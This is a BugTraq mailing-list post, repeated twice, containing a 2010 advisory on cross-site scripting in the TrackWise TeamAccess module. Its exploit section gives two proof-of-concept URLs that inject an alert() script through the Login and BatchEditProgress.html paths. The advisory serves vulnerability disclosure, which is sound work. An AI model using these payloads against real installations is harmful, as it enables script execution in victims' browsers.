BugTraq
Back to list
|
Post reply
Sparta Systems TrackWise TeamAccess module Multiple Cross Site Scripting Vulnerabilities
Mar 02 2010 12:42PM
lament ilhack org
=========================================
Yaniv Miron aka "Lament" Advisory Feb 28, 2010
Sparta Systems TrackWise TeamAccess module Multiple Cross Site Scripting Vulnerabilities
=========================================
=====================
I. BACKGROUND
=====================
TrackWise® by Sparta Systems: A Holistic Approach to Enterprise Quality Management
TrackWise by Sparta Systems is an enterprise quality management solution (EQMS)
that optimizes quality, ensures compliance and reduces costs for world-class clients
across a range of industries. TrackWise is the only enterprise quality management solution that offers the flexibility and configurability
to adapt to company-specific business processes,
enabling our world-class clients across a range of industries to define, track, manage
and report on the core activities vital to their success.
http://www.spartasystems.com/trackwise-eqms/
=====================
II. DESCRIPTION
=====================
A malicious attacker may inject scripts into the TrackWise application.
=====================
III. ANALYSIS
=====================
Exploitation of this vulnerability results in the execution of arbitrary
code using a malicious link.
=====================
IV. EXPLOIT
=====================
http://example.com/[TrackWiseDir]/servlet/TeamAccess/Login/"><script>ale
rt('XSS-By-Lament')</script>
http://example.com/[TrackWiseDir]/servlet/TeamAccess/BatchEditProgress.h
tml/"><script>alert('XSS-By-Lament')</script>
=====================
V. DISCLOSURE TIMELINE
=====================
Jan 2009 Vulnerability Found
Jan 2009 Vendor Notification
Feb 2010 Public Disclosure
=====================
VI. CREDIT
=====================
Yaniv Miron aka "Lament".
lament (at) ilhack (dot) org [email concealed]
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
Yaniv Miron aka "Lament" Advisory Feb 28, 2010
Sparta Systems TrackWise TeamAccess module Multiple Cross Site Scripting Vulnerabilities
=========================================
=====================
I. BACKGROUND
=====================
TrackWise® by Sparta Systems: A Holistic Approach to Enterprise Quality Management
TrackWise by Sparta Systems is an enterprise quality management solution (EQMS)
that optimizes quality, ensures compliance and reduces costs for world-class clients
across a range of industries. TrackWise is the only enterprise quality management solution that offers the flexibility and configurability
to adapt to company-specific business processes,
enabling our world-class clients across a range of industries to define, track, manage
and report on the core activities vital to their success.
http://www.spartasystems.com/trackwise-eqms/
=====================
II. DESCRIPTION
=====================
A malicious attacker may inject scripts into the TrackWise application.
=====================
III. ANALYSIS
=====================
Exploitation of this vulnerability results in the execution of arbitrary
code using a malicious link.
=====================
IV. EXPLOIT
=====================
http://example.com/[TrackWiseDir]/servlet/TeamAccess/Login/"><script>ale
rt('XSS-By-Lament')</script>
http://example.com/[TrackWiseDir]/servlet/TeamAccess/BatchEditProgress.h
tml/"><script>alert('XSS-By-Lament')</script>
=====================
V. DISCLOSURE TIMELINE
=====================
Jan 2009 Vulnerability Found
Jan 2009 Vendor Notification
Feb 2010 Public Disclosure
=====================
VI. CREDIT
=====================
Yaniv Miron aka "Lament".
lament (at) ilhack (dot) org [email concealed]
[ reply ]